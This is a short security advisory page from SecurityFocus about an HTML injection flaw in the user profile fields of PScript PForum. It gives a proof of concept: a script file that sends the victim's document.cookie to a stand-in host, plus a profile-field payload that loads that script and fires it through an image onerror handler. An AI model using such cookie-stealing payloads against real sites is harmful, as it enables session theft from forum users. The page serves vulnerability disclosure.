Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PScript PForum User Profile HTML Injection Vulnerability

There is no exploit required. The following example is available:

Create a Javascript file and save it as bad.js (your domain name is in this
case example.com). The file contains the following code:

// bad.js
function b()
{
location.href='example.org/compute_stolen_data.ext?'+document.cookie;
}

Edit your profile and enter the following line into the IRC Server or AIM
ID Input Box. The string have to be shorter then 100 characters.

// Input Box (without line break)
"><script src=http://example.com/bad.js></script>
<img height=0 width=0 src=foo onerror=b(); >







 

Privacy Statement
Copyright 2009, SecurityFocus